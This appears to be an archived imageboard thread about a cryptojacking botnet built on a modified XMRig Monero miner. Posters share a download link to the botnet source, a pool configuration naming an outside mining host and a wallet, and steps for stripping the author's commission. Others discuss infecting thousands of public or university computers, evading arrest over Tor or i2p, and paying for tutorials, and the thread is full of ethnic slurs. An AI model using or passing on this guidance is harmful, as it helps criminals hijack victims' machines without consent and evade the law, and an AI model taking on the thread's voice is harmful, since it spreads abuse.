Thread continuation

thread continuation

WHAT THE HELL DO I CHANGE IN CONFIG TO MAKE MUH PROFITS

also is OPs comission really only 3%? someone posted his code so we should know it by now

Other urls found in this thread:

files.catbox.moe/dd5qsu.rar
warosu.org/biz/thread/S4561425
warosu.org/biz/thread/S4561425#p4563791
twitter.com/AnonBabble

Enjoy your ban for rule violation

dumb fuck

He deleted the thread

Here is retarded pajeet's code
files.catbox.moe/dd5qsu.rar

Just remove all his retarded shit about muh commisions, get rid of his tampered xmrig and and have the process.start pointed to a current version of xmrig, you can pick pools and all that using xmrig's config file

source: warosu.org/biz/thread/S4561425

jesus just tell me

"pools": [
{
"url": "ymir.dynu.net:9090",
"user": "47pGNXfw485YRBF4ajvmhJKaXgzUG9QEB3TMPQKz1TGN9BivtyRNaUMQnKUtswhKXY3KnntWbioNv6SNvg86CjXZ15cVsw2",
"pass": "CARBON",
"keepalive": true,
"nicehash": false
}
]
}

die already

I want to know first

How does middle school feel, dumbfuck? Sage.

The only thing you need to know is that according to the source you get nothing, his comission is 100%

but I got so exiced to infect computers and I want to make gainz

can you help me with that?

HOW DO I GET OTHER COMPUTERS TO MAKE ME MONEY I PAY 50$ FOR FULL TUTORIAL

>4242
nice gte

1DwBxwh8cuLfSM5UVMC6EueU1orms5m1H8

$50 in btc and ill upload my version with the commission taken out

Poo in loo pajeet indian retard.

shit it feels so close yet so far away

I pay you even 100 but only after first moneros come to my wallet

>mfw OP infects his own pc
pajeet steels his passwords and identity
top kek

The moment the source was posted pajeet went into panic mode and deleted the thread, you can use the source to make your own variation with minimal effort for free

If you can't do anything at all with all these things provided for you, you're hopeless and should stop posting since you'll end up paying money for you to spread their shitty bootleg botnet variant for them to get rich, the only obstacle right now to a life of riches for you at this very moment is your own retarded self, everything else is right there for the taking

hey man why does global.cs have no code in it?

there are 5 files which I don't even know what program do I use for editing them

also this

thats retarded

post an email address after you send the btc and ill send the code there

leaving thread otherwise. will wait for btc

I can see the pajeet code.
I'm on linux btw.

I don't really see where a xmr miner gets installed in the code?

Also where did you or where did this code come from?

lol he's obviously just trying to spread his mining to your computer.

He didn't do any mining code, he is using xmrig to do that part
warosu.org/biz/thread/S4561425#p4563791

i've checked the code again and it seems to download the actual xmr miner ? or what ?

then it runs it with the settings in config.json?

i'm very tired, could you like give me the url to the xmr miner code or something or exe?

the pajeet code pack seems incomplete or im too tired

ok i'll look into xmrig. thnx for code looks nice and clear to read.

I might actually try to drop this at the city college or something lel.

i'd never thought i'd use windows again but i'll probably need to to compile this piece of shit dot net code.

bro im going to look into compiling this shit and if it actually works and mines for me I'm going to need your XMR address to tip you in the future.

i live in a european country where computer security is an absolute joke and I can probably infect a few thousand computers in public places.

The only step in not getting caught is being sure that i sign up for the minig pool from an i2p in/out node rite? or tor ...

Enjoy getting arrested

i was obviously joking im not gonna do this ha-ha
ha... ha .. fucking 4chins.

im not gonna do it, too risky i'll stick to trading

Use one of the public rigs you gone infect and you should be clear. Start somewhere fr away from your own place. Don't shit where you eat.
btw drop this on /b/ and /pol/, xmr might kuiper belt with the help of autist central

If it's so easy to make money of botnet mining, then why isn't everyone doing it?

you dont even need to sign up for xmr pools, just put in your address and go

>sign up for the minig pool from an i2p in/out node rite?
wait what? how do I not get arrested after I learn programming?

Because you can't cash out

Because the majority of humans are not clever and cryptofags are for the most part scared cats in addition

holy shit I already loved xmr but now I love it even more.

lmao, i might actually try this out. too bad most public computers in my country have top tier security, temporary accounts that get wiped and all that shite.

Is this legit? I wish I could get a sincere answer. I have acess to over 700 computers in my university. I must point out I'm a complete brainlet with coding.

>i live in a european country where computer security is an absolute joke and I can probably infect a few thousand computers in public places.

Nice.

>I'm going to need your XMR address to tip you in the future
I don't want yours or anyone's money, you're free to do what you want

Yes download random exe files from Veeky Forums

kek. I wanted to say some very funny shit about security here and previous shit i've encountered but it would ruin my OPSEC.

thnx for posting the code.
happen to know where the user that found it got it from? probably some trojan forum a la hackhound tier?

oy vey, do you work for the NSA or something?

Nice

Bump, willing to pay for this information.

bump of cocaine

more cocaine

is there anything more I need to do than change wallet adress in code?

don't touch that shit